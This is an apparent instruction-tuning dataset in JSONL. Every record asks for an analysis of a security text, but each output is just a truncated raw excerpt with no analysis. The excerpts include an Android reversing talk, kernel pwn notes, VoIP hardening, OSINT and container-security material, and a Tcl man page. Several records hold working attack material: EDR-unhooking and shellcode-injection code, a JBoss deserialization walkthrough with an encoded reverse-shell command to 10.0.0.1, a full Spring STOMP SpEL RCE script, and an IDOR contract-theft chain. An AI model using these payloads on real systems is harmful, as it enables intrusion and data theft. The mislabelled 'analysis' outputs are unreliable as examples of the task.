{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndroid App逆向工程與簽章技術 Joey{27350000 @ hst.tw} 這場演講三不一沒有 三不一沒有  三不  我不是駭客我是魯蛇  我不會Android  這場演講不難大家都聽得懂  一沒有  這場演講沒有太多梗有的話幫幫忙笑一下 About Me  Joey Chen  目前 - 國立臺灣科技大學資管所 菸酒生 研究生 - Hack-Stuff Technology Core member - 趨勢科技實習生  證照  ISO 27001:2013  BS 10012:2009  經歷  2012年駭客年會第三名  2013年駭客年會第二名  2014年Honeynet CTF 第二名  精專於 - 加解密與數位簽章 - 逆向工程 演講重點  今日演講不再技術  演講重點在於努力  希望大家找到熱情 大綱  逆向工程  簽章技術  工具介紹  Android OS 介紹  拆解第一個 App  修改第一個 App  保護 App  結論  Q&A 預備知識(1) - 逆向工程  Compiler V.S Reversing Engineer  直譯式 V.S 編譯式  程式語言的不同, ex : C/C++, .Net , Java  File format 的不同, ex : *.exe, *.dll, *.jar 預先處理 編譯 組譯 連結 原始碼 執行檔 *.obj *.lib file.obj 工具介紹(1) - Genymocom 工具介紹(2) - Sublime 工具介紹(3) - IDA pro 預備知識(2) - 數位簽章 發文者 收文者 雜湊 函數 10101010 11111111 簽體 私鑰 加密 11111111 簽體 傳送給收文者 雜湊 函數 10101010 11111111 簽體 公鑰 解密 10101010 Verify ? Yes : No 表示資料未被篡改 且確認發文者身份 Android OS 資料來源hgp://en.wikipedia.org/wiki/Android_(operacng_system) APK 包裝過程 Applicacon Resources R.java .class File Applicacon Source Code Java Interfaces .aidl File aapt aidl Java Compiler dex 3rd Party Libraries and .class File .dex File apkbuilder Compiler Resources Other Resources APK 簽章過程 Debug or Release Keystore Jarsigner Signed .apk Zipalign (release mode) Signed and Aligned.apk 使用Zipalign工具對簽名後的APK進行對齊處理它位於 android-sdk/tools他的主要工作是將apk套件進行對齊處理 使apk套件中的所有資源檔距離檔案起始偏移為4位元組整數 倍這樣透過記憶體映射存取apk檔案時速度會更快 破解第一支 APP  破解工具  Apktool, dex2jar, JD-GUI, IDA pro, androguard  環境  OSX, windows, linux  開發工具  Eclipse, Android SDK, Android NDK, genymocon  先備語言  Java, C/C++, .Net 檢視 APK 檔案格式  Apk : Android 應用程式套件檔案  META-INF  MANIFEST.MF : 清單資訊Manifest file  CERT.RSA : 儲存著該應用程式的憑證和授權資訊  CERT.SF : 儲存著 SHA-1 資訊資源清單  Lib : 已編譯好的程式  Res :不需要被編譯的檔案, ex : *.png, *jpg   Assets :用於存放需要打包到應用程式的靜態檔以便部署到設備中, ex : 政策條款等等  AndroidManifest.xml :傳統的Android清單檔案有該應用程式名字 版本號所需權限註冊服務連結的其他應用程式名稱  classes.dex : classes檔案通過DEX編譯後的檔案格式用於在Dalvik虛 擬機器上執行的主要代碼部分  resources.arsc : 有被編譯過的檔案, ex : 被編譯過的xml Apktool : A Tool for Reverse APK  Features  Disassembling resources to nearly original f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 基础知识 介绍一些 linux kernel pwn 会用到的基础知识后续会逐渐补充 主要参考了 [Linux Kernel Exploitation](https://github.com/ctf-wiki/ctf-wiki/blob/master/docs/pwn/linux/kernel/ref/13_lecture.pdf) ## Kernel kernel 也是一个程序用来管理软件发出的数据 I/O 要求将这些要求转义为指令交给 CPU 和计算机中的其他组件处理kernel 是现代操作系统最基本的部分 kernel 最主要的功能有两点 1. 控制并与硬件进行交互 2. 提供 application 能运行的环境 包括 I/O权限控制系统调用进程管理内存管理等多项功能都可以归结到上边两点中 需要注意的是**kernel 的 crash 通常会引起重启** ## Ring Model intel CPU 将 CPU 的特权级别分为 4 个级别Ring 0, Ring 1, Ring 2, Ring 3 Ring0 只给 OS 使用Ring 3 所有程序都可以使用内层 Ring 可以随便使用外层 Ring 的资源 使用 Ring Model 是为了提升系统安全性例如某个间谍软件作为一个在 Ring 3 运行的用户程序在不通知用户的时候打开摄像头会被阻止因为访问硬件需要使用being驱动程序保留的 Ring 1 的方法 大多数的现代操作系统只使用了 Ring 0 和 Ring 3 ## Loadable Kernel Modules(LKMs) 可加载核心模块 (或直接称为内核模块) 就像运行在内核空间的可执行程序包括: - 驱动程序Device drivers - 设备驱动 - 文件系统驱动 - ... - 内核扩展模块 (modules) LKMs 的文件格式和用户态的可执行程序相同Linux 下为 ELFWindows 下为 exe/dllmac 下为 MACH-O因此我们可以用 IDA 等工具来分析内核模块 模块可以被单独编译但不能单独运行它在运行时被链接到内核作为内核的一部分在内核空间运行这与运行在用户控件的进程不同 模块通常用来实现一种文件系统一个驱动程序或者其他内核上层的功能 > Linux 内核之所以提供模块机制是因为它本身是一个单内核 (monolithic kernel)单内核的优点是效率高因为所有的内容都集合在一起但缺点是可扩展性和可维护性相对较差模块机制就是为了弥补这一缺陷 ### 相关指令 - **insmod**: 讲指定模块加载到内核中 - **rmmod**: 从内核中卸载指定模块 - **lsmod**: 列出已经加载的模块 - **modprobe**: 添加或删除模块modprobe 在加载模块时会查找依赖关系 > 大多数 CTF 中的 kernel vulnerability 也出现在 LKM 中 ## syscall 系统调用指的是用户空间的程序向操作系统内核请求需要更高权限的服务比如 IO 操作或者进程间通信系统调用提供用户程序与操作系统间的接口部分库函数如 scanfputs 等 IO 相关的函数实际上是对系统调用的封装read 和 write > 在 */usr/include/x86_64-linux-gnu/asm/unistd_64.h* 和 */usr/include/x86_64-linux-gnu/asm/unistd_32.h* 分别可以查看 64 位和 32 位的系统调用号 > 同时推荐一个很好用的网站 [Linux Syscall Reference](https://syscalls.kernelgrok.com)可以查阅 32 位系统调用对应的寄存器含义以及源码64位系统调用可以查看 [Linux Syscall64 Reference](https://syscalls64.paolostivanin.com/) ## ioctl 直接查看 man 手册 ``` NAME ioctl - control device SYNOPSIS #include <sys/ioctl.h> int ioctl(int fd, unsigned long request, ...); DESCRIPTION The ioctl() system call manipulates the underlying device parameters of special files. In particular, many operating characteristics of character special files (e.g., terminals) ma", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n测试环境安装了bitdefender方便查看Hook情况使用x64debug进行进程调试运行notepad 进程然后使用x64debug附加到进程x64debug中断 在Symbols标签搜索Token类函数可以看到与Token类相关的函数 我们选择NtAdjustGroupsToken,双击便可以进入到该函数的调用流程 也就是我们常见的形式 但如果我们选择NtAdjustPrivilegeToken 可以看到直接进入了一个jmp的跳转我们跟进去 mov r10,rcx 1 mov eax,xx 2 syscall 3 里面是一些mov语句然后push rax然后ret执行我们可以使用Ctrl+G进跟踪 跟进去之后可以发现其调用了bitdefender的dll 除此之外可以勾选DLL Load便可以清楚的在调试过程中看到DLL的Load情况 然后我们便可以知道我们的api调用会被atcuf64所截获图示如下 下面是Hook如何进行函数检测并使得我们常见的shellcode执行方法失效的shellcode注入主要代码 demo如下 unHook与代码注入 hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 1 PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, 2 FALSE, (DWORD) pid); 3 pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ); 4 WriteProcessMemory(hProc, pRemoteCode, (PVOID) payload, (SIZE_T) payload_len, (SIZE_T *) NULL); 5 6 hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteCode, NULL, 0, NULL); 7 if (hThread != NULL) { 8 WaitForSingleObject(hThread, 500); 9 CloseHandle(hThread); 10 return 0; 11 编译运行无法注入到指定进程因为所使用的函数已经被监控直接被干掉了.这里使用FreshCopy的 方式进行Unhook核心代码如下 } 12 DWORD oldprotect = 0; 1 PIMAGE_DOS_HEADER pImgDOSHead = (PIMAGE_DOS_HEADER) pMapping; 2 PIMAGE_NT_HEADERS pImgNTHead = (PIMAGE_NT_HEADERS)((DWORD_PTR) pMapping + pImgDOSHead->e_lfanew); 3 int i; 4 5 6 unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 }; 7 8 VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) sKernel32), (LPCSTR) sVirtualProtect); 9 10 // find .text section 11 for (i = 0; i < pImgNTHead->FileHeader.NumberOfSections; i++) { 12 PIMAGE_SECTION_HEADER pImgSectionHead = (PIMAGE_SECTION_HEADER) ((DWORD_PTR)IMAGE_FIRST_SECTION(pImgNTHead) + 13 ((DWORD_PTR) IMAGE_SIZEOF_SECTION_HEADER * i)); 14 15 16 if (!strcmp((char *) pImgSectionHead->Name, \".text\")) { 17 18 VirtualProtect_p((LPVOID)((DWORD_PTR) hNtdll + (DWORD_PTR) pImgSectionHead- >VirtualAddress), 19 pImgSectionHead->Misc.VirtualSiz", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGuidelines for Securing Your VoIP PBX Unregistered436 / Patrick McNeil  July 2015 Information Leakage Prevention (Confidentiality) Block scanners with firewall rules or a VoIP security appliance that matches on signatures of known scanners and/or credential cracking behaviors (See our iptables rules). Change the User-Agent value to something generic or even to that of an alternate type of system to trick attackers into the wrong approach. Ex: Asterisk becomes Avaya CM. Set or change the default SIP realm. If possible, use a different set of audio prompts than the system default. Take a packet capture and look for identifying fields (and investigate how to change them). Consider a Session Border Controller (SBC) to anchor sessions, perform NAT, and filter out identifying fields with header manipulation rules (topology hiding). Management & Services Assurance (Integrity) Follow vendor specific hardening guides like THIS Dont put PBX admin interfaces on the Internet. Block access to management IP address ranges and/or protocols on the edge router or firewall. Require VPN access for management functions. SIP usernames should never match extensions. Use long passwords, and change ALL of them! Use a secure encrypted management protocol for everything (no telnet/FTP), and audit the encryption algorithms configured for use (HTTPS, SSH, etc). Note that None is a valid HTTPS algorithm, meaning NO encryption is performed! Dont assume that the vendors out of band management ports are safe because they are out of band. An attacker can pivot from a compromised internal network to a management network. Dont use a monolithic PBX distribution OR be diligent about auditing what software you really need to be running. Shut down unnecessary services. Ex: Do you NEED AMI? PATCH! Sign up for vendor security notifications. Where feasible, use TLS to protect VoIP signaling, and SRTP to protect media. Do not re-use existing vendor certificates, and always issue your own or buy a public cert", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnologin === 拒绝用户登录系统 ## 补充说明 **nologin命令** 可以实现礼貌地拒绝用户登录系统同时给出信息如果尝试以这类用户登录就在log里添加记录然后在终端输出This account is currently not available信息就是这样一般设置这样的帐号是给启动服务的账号所用的这只是让服务启动起来但是不能登录系统 ### 语法 ```shell nologin ``` ### 实例 Linux禁止用户登录 禁止用户登录后用户不能登录系统但可以登录ftpSAMBA等我们在Linux下做系统维护的时候希望个别用户或者所有用户不能登录系统保证系统在维护期间正常运行这个时候我们就要禁止用户登录 1禁止个别用户登录比如禁止lynn用户登录 ```shell passwd -l lynn ``` 这就话的意思是锁定lynn用户这样该用户就不能登录了 ```shell passwd -u lynn ``` 上面是对锁定的用户lynn进行解锁用户可登录了 2我们通过修改`/etc/passwd`文件中用户登录的shell ```shell vi /etc/passwd ``` 更改为 ```shell lynn:x:500:500::/home/lynn:/sbin/nologin ``` 该用户就无法登录了 3禁止所有用户登录 ```shell touch /etc/nologin ``` 除root以外的用户不能登录了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149 该漏洞为 Java反序列化错误类型存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化从而导致了漏洞 参考 - https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg - https://access.redhat.com/security/cve/cve-2017-12149 ## 测试环境 运行测试环境 ``` docker compose up -d ``` 首次执行时会有1~3分钟时间初始化初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面 ## 漏洞复现 该漏洞出现在`/invoker/readonly`请求中服务器将用户提交的POST内容进行了Java反序列化 ![](img/1.png) 所以我们用常规Java反序列化漏洞测试方法来复现该漏洞 ### 编写反弹shell的命令 我们使用bash来反弹shell但由于`Runtime.getRuntime().exec()`中不能使用管道符等bash需要的方法我们需要用进行一次编码 工具http://www.jackson-t.ca/runtime-exec-payloads.html ![](img/2.png) ### 序列化数据生成 使用[ysoserial](https://github.com/frohoff/ysoserial)来复现生成序列化数据由于Vulhub使用的Java版本较新所以选择使用的gadget是CommonsCollections5 ``` java -jar ysoserial.jar CommonsCollections5 \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}\" > poc.ser ``` ### 发送POC 生成好的POC即为poc.ser将这个文件作为POST Body发送至/invoker/readonly即可 ![](img/3.png) 成功反弹shell ![](img/4.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nn in t h e d it io n Mic h a e l Ba z ze l l Re s o u r c e s f o r Se a r c h in g a n d a n a l y z in g On l in e in f o r ma t io n Ope n s o u r c e In t e l l ig e n c e t e c h n iq u e s -_____ J Copyright  2022 by Michael Bazzell Project Editors: Y. Varallo, Janice Bartlett Technical Editors: Jason Edison, David Westcott, Peter Richardson Ninth Edition First Published: January 2022 Library of Congress Control Number (LCCN): Application submitted ISBN: 9798761090064 OPEN SOURCE INTELLIGENCE TECHNIQUES: r e s o u r c e s f o r Se a r c h in g a n d An a l y z in g o n l in e In f o r ma t io n Nin t h e d it io n warranty. The author has taken great or omissions. No liability is assumed use of the information or were confirmed accurate as of January 1, 2022. Readers may find slight discrepancies within the metho technology changes. The information in this book is distributed on an As Is\" basis, without care in preparation of this book, but assumes no responsibility for errors for incidental or consequential damages in connection with or arising out of the programs contained herein. Due to the use of quotation marks to identify specific text to be used as search queries and data entry, the au has chosen to display the British rule of punctuation outside of quotes. This ensures that the quote con accurate for replication. The author has also chosen to omit \"smart\" or \"curly\" single and double quotes in or to maintain proper emphasis within search queries and scripts. Only straight quotation marks an apostro are presented. To maintain consistency', these formats are continued throughout the entire book. Rather than use a trademark symbol with every occurrence of a trademarked name, this book uses the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. All rights reserved. No part of this book may be reproduced in any form or by any electronic or mechanical means, including information ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n字节容器技术实践 01 未来5年容器云在 公有云市场上渗透率将超过50 % 未来5年私有云 容器云平台市场C AGR将达到3 3 % 全球容器安全市场的 复合年增长率 (C AGR) 预计为3 0 .9% 到2 0 2 4年全球市场规模约为1 50 亿元人民币 国内市场发展规模约占50 亿元 原生&容器业务技术趋势 数据来源于IDC 与M a rketsa n d M a rkets 部容器规模和现状 面向现代化应用构建平台化能力  结合现代化应用特点为用户提供新一代云原生架构下 的研发工具栈与方法论保证业务敏捷迭代弹性稳定 运行  结合经过实践验证的端技术和边形态构建 云-边-端一体化的应用管理能力 云原生 (Cloud Native) 多端应用 (MARS) 混合云的早期成功实践者  IaaS 使用多家公有云和自有 IDC 的混合架构 PaaS 层构建了面向应用的多云平台满足 应用的多云多活敏捷自动化部署等关键诉求 多云多活 私有云 公有云 字节系产品全栈运行于云原生架构  国内使用容器最早容器规模最大的厂商之一 最早将服务网格应用到生产的厂商 移动应用敏捷开发  字节跳动业务种类繁多在内部催生出的 veMars 产 品是字节在移动端业务的杀手锏  覆盖全场景多平台多角色贯穿应用设计应用 搭建二次开发环境部署的通用低代码开发中台 在线微服务 10w+ 工作负载 20w+ Pod 1000w + 日变更数 2w+ 峰值请求 2亿+ 月活 6亿+ 应用数 100+ 业务视角的核心诉求 一站式 PaaS 平台为用户提供了服务托管能力实现了服务部署和运维流程的自动化加速了业务研发和迭代的效率 但在实际使用过程中业务仍然存在一些核心诉求 容器问题诊断 自动化故障恢复 资源按需供应 资源使用成本  服务运行过程中不可避免出现异 常  问题可能源自系统硬件网络 服务自身上下游依赖等各个方 面  业务很难自主完成端到端异常检 测  多维度的监控体系协助问题排查  智能报警系统自动化通知服务异常  异常请求可能导致服务过载  单机抖动可能影响服务性能  集群甚至机房故障可能造成 全量服务不可用  自研流量调度体系实现异常 检测和自动化处理  多集群联邦实现跨集群跨机房 容灾能力  业务流量存在时间亲和性需 要自动化按需提供资源  面对节日直播促销等场景 需要快速供应大量资源  在保证服务性能的前提下单 位资源成本尽可能低廉  服务自动化弹性伸缩实现资 源按需供应保证服务稳定 性  一键式资源拆借实现临时大 规模资源需求  通过多维度隔离手段实现 在离线混合部署提升资源 利用效率降低单位资源成 本 自动化诊断平台 核心亮点 1 多集群联邦和智能流量调度 核心亮点 2 容器实例弹性供应 核心亮点 3 混合部署提升资源效率 核心亮点 4 的核心诉求 上千人涌入同一篇启动文档了解项目上下文和 团队详细分工 超 大 规 模 流 量 融合线路边缘计算与全链路 动态流量调度 时间任务团队都在一张表格上 每日同步实时更新保证所有团队 步调一致 复 杂 服 务 治 理 Serv iceM esh 与离在线资源统 一调度系统 极 致 研 发 效 能 压力测试一站式观测平台与 公共组件建设 全国 703 亿次的红包互动 498.46 万的直播同时在线用户 云拜年视频总播放量506 亿次 20+部门互娱推荐数据基础架构 千人级的在线项目沟通与协作 抖音-春晚红包雨火山引擎以字节速度打造的春晚全民级产品的最佳实践 传统的安全威胁仍然存在  上传webshell或利用反弹shell进行驻留 控制  利用漏洞进行渗透  病毒木马恶意程序  本地提权    云原生带来新的安全问题  攻击面的多样性  镜像  容器  运行环境 (docker/k8s)  主机  攻击面的特有  性 容器逃逸  容器网络内部东西向    运行环境的访问控制  Secret的不正确暴露 问题 云工作负载防护架构 02 物理主机系统 / 虚拟机主机系统 CI/CD 镜像仓库 K8S docker 资产清 点 ----- --- 资源层 Agent 能 力 组件 漏洞扫描 ----- --- 合规基线 ----- --- 账号风险 ----- --- 入侵检测 ----- --- 网络隔离 ----- --- 病毒检测 ----- --- 病毒隔离 容器隔离 启动阻断 CI阻断 网络控制 控制 面 入侵控制 氢盾 Elkeid Driver 氢盾 Elkeid Agent 物理 / 虚拟主机系统 镜像 组件 安全告警 安全策略 行为模型 威胁检测 异常检测 API接口 server 业 务 场 景 - - - - - - - - 传 统 主 机 安 全 容 器 安 全 运 行 时 / 网 络 / ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKnocking my neighbors kids cruddy drone offline. michael robinson First, a shout out Alan Mitchell Ron McGuire Chris Taylor KaAe Herritage My neighbor. Sigh. My neighbors kid. Double sigh. Way too much discreAonary spending. My neighbor. Sigh. My neighbors kid. Double sigh. My iniAal response: But that got me thinking What if this showed up? Or if this showed up? Now there are LOTS of regulaAons governing the flying of Unmanned AircraR Systems. Most laws restrict: 1. Government/law enforcements use 2. Commercial use (FAA needs to authorize.) Non-commercial, private (hobbyist) use largely not regulated YET. Some current regulaAons on UAS: 1. No fly zones: 1. Around Washington, DC (15 mi radius) 2. Around airports (5 mi radius) 3. On military bases 2. Cannot launch, land, or crash in a naAonal park. Technically, air space is not NaAonal Park Services (NPS) to regulate; however, NPS can get you for safety (reckless endangerment) and noise issues. 3. Temporary Flight RestricAons within the area of a disaster, wildfire, stadium/sporAng event, or PresidenAal visit. 4. Cannot mount a gun on a UAS  it becomes a weapon system. 5. 400 foot ceiling 6. Line of site 7. Sixteen states have enacted their own laws. Requirements to Qualify as a Model Aircra6 under the FAA Moderniza:on and Reform Act of 2012 (P.L. 112-95, sec:on 336) SecAon 336 also prohibits the FAA from promulgaAng any rule or regulaAon regarding a model aircraR, or an aircraR being developed as a model aircraR if the following statutory requirements are met:  the aircraR is flown strictly for hobby or recreaAonal use;  the aircraR is operated in accordance with a community-based set of safety guidelines and within the programming of a naAonwide community-based organizaAon;  the aircraR is limited to not more than 55 pounds unless otherwise cerAfied through a design, construcAon, inspecAon, flight test, and operaAonal safety program administered by a community-based organizaAon;  the aircraR is operated in a manner that do", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python3 import requests import random import string import time import threading import logging import sys import json logging.basicConfig(stream=sys.stdout, level=logging.INFO) def random_str(length): letters = string.ascii_lowercase + string.digits return ''.join(random.choice(letters) for c in range(length)) class SockJS(threading.Thread): def __init__(self, url, *args, **kwargs): super().__init__(*args, **kwargs) self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}' self.daemon = True self.session = requests.session() self.session.headers = { 'Referer': url, 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' } self.t = int(time.time()*1000) def run(self): url = f'{self.base}/htmlfile?c=_jp.vulhub' response = self.session.get(url, stream=True) for line in response.iter_lines(): time.sleep(0.5) def send(self, command, headers, body=''): data = [command.upper(), '\\n'] data.append('\\n'.join([f'{k}:{v}' for k, v in headers.items()])) data.append('\\n\\n') data.append(body) data.append('\\x00') data = json.dumps([''.join(data)]) response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data) if response.status_code != 204: logging.info(f\"send '{command}' data error.\") else: logging.info(f\"send '{command}' data success.\") def __del__(self): self.session.close() sockjs = SockJS('http://your-ip:8080/gs-guide-websocket') sockjs.start() time.sleep(1) sockjs.send('connect', { 'accept-version': '1.1,1.0', 'heart-beat': '10000,10000' }) sockjs.send('subscribe', { 'selector': \"T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')\", 'id': 'sub-0', 'destination': '/topic/greetings' }) data = json.dumps({'name': 'vulhub'}) sockjs.send('send', { 'content-length': len(data), 'destination': '/app/hello' }, data)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeaconEye的原理 Cs的beacon在初始化时会使用 malloc 函数创建一个空间将beacon的明文信息写入到其中 这就是一个很明显的检测CobaltStrike的信息 malloc 函数创建的是堆内存所以只需要遍历每个进程 的堆内存地址就可以了 当然这一切都归功于很多前辈们对Cobalt Strike的逆向工程 于是就有了beaconeye的项目https://github.com/CCob/BeaconEye 对于堆内存的查找还有很多注意事项可以看参考中的文章 BeaconEye的使用 BeaconEye是c#项目我对它也不怎么熟悉下面内容是我自己的方法 项目-> 属性 设置好.net 框架我设置的是4.6.1因为还要装一个libyara的扩展它好像只支持这个版本 项目->管理NuGet程序包 搜索安装 Microsoft.O365.Security.Native.libyara.NET 编译的架构要选上不能选择any cpu 之后就能生成了 BeaconEye改造 默认的BeaconEye是不显示公钥的凭我对c#一点点微弱的理解要改这里 https://github.com/CCob/BeaconEye/blob/master/Config/ConfigItem.cs 可以猜到它typeof后面对应的类型应该就是这个字段对应的类型而没看到 PublicKey 需要的类型只 能看着别的类型自己加上了 添加一个 再加上序号7 public class ConfigDataItem : ConfigItem { public override Type ExpectedType => Type.Bytes; public string Value { get; private set; } public ConfigDataItem(string name) : base(name) { } public override string ToString() { return $\"{Value}\"; } public override void Parse(BinaryReader br, ProcessReader process) { Value = ReadNullString(process, process.Is64Bit ? br.ReadInt64() : br.ReadInt32()); } string ReadNullString(ProcessReader process, long address) { MemoryStream ms = new MemoryStream(); for(int i = 0; i < 256; i++) { var strChar = process.ReadMemory((ulong)address++, 1); ms.Write(strChar, 0, 1); } byte[] buffer = ms.ToArray(); StringBuilder strBuider = new StringBuilder(); for (int index = 0; index < buffer.Length; index++) { strBuider.Append(((int)buffer[index]).ToString(\"X2\")); } return strBuider.ToString(); } } 就能够输出公钥了 后面还有一些针对metaheader的改造但是太杂乱了就直接在附件上源码了 结合上线器 之后我想将beaconeye集成到cs上线器中在网页上一键化生成按理说我应该把beaconeye改装成输 出beacon.json文件的形式但是对c#真不熟悉只能按照它作者的想法来不敢有大的改动所以很 多地方都是直接打印到控制台 然后通过解析控制台的内容将它解析成CS上线器认识的数组CS上线器只需要一个公钥一个 metaheader信息即可上线 def memory_dump(): exec_filename = os.path.join(beaconeye_dir, \"BeaconEye.exe\") dd = { \"PublicKey\": \"\", \"C2Server\": \"\", \"HttpGet_Metadata\": { \"ConstHeaders\": [], \"ConstParams\": [], \"Metadata\": [], \"Output\": [], \"SessionId\": [] } } p = subprocess.Popen(exec_filename, stdin=subprocess.PIPE, stdout=subprocess.PIPE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1998-2000 by Scriptics Corporation. '\\\" All rights reserved. '\\\" '\\\" RCS: @(#) $Id: keysyms.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of description of a specific option. cmdName gives the '\\\" option's name as specified in the class command, dbName gives '\\\" the option's name in the option datab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n记一次受限制的文件下载 其实这个操作比较简陋主要是减少了很多其他功夫 首先在 app 中发现这个功能 可以下载合同信息里边有很多敏感信息等 且可以下载导出的 点击下载 然后分享一下 手机登录 qq 然后就可以分享到 qq 好友 就可以查看文件了 就能获取到这个合同的详细信息了 这里有一个点 有几个数据包 是能看到 合同 的内容 合同的下载地址两个信息 这里的 frameurl 需要留意一下 但是 有签名校验 无法越权等操作这里的签名之前绕过所以加了两层 不太好去跟 也是 后边直接 hook 的原因 其中发现有一个数据包泄露了合同地址 于是直接 curl 下载一下看看 发现无响应 然后我解析了一下域名发现 这时候在考虑它是怎么下载的 所以推测是利用 app 本身重组数据包调用它其他的接口下载 然后上 jadx 查看 app 代码 查看数据包 通过上述有几个数据包 泄露的返回包信息的 几个特殊字段 就是上边的 frameurl 这种比较唯一的字段能很快的帮助我们定位到比较准确的位置 然后搜了一下索引在根据 函数的声明和引用 最后定位到了这里 发现这个关键词 download 和 filepath 感觉很像这里 上 objection hook 一下这个函数 然后去下载合同功能 点一下 发现成功打印出参数 返回值 调用栈 发现确实 这个合同的地址 走到了这里 所以 想到 我可以通过 frida 直接 hook 这个函数 因为它的参数校验比较多去跟的话 太费时间了 我去传入合同地址 让他去下载然后我再导出即可 发现这个文件名构造非常简单 合同地址后边是时间戳 然后通过它的 web 端 找到了一处可以越权查看所有合同的创建时间这里是之前测试发现 一处没啥用的越权 没在意就留着了 遍历这个点 就可以获取到 所有合同的生效时间了 这样对于后边我们批量获取合同文件名 结合 就完成了攻击链 碰到没啥用的漏洞可以先留着 说不定后边就用到了 开始 hook 登录进去点击我的合同 直接重复之前的下载过程 成功 hook 完整下载 其实这个 后边 还能 玩一下 ssrf 到内网的 因为我们文件的下载地址也是本地局域网的同理找一下内网的地址试一下 跟一下这个函数完整的流程也能找到它去处理这个地址构造发包的逻辑 如果要跟 sign 的不知道要花多少时间这个点前后 10 分钟就梭哈完成了危害厂商也是拉 满了", "category": "text_analysis", "source": "security_papers"}
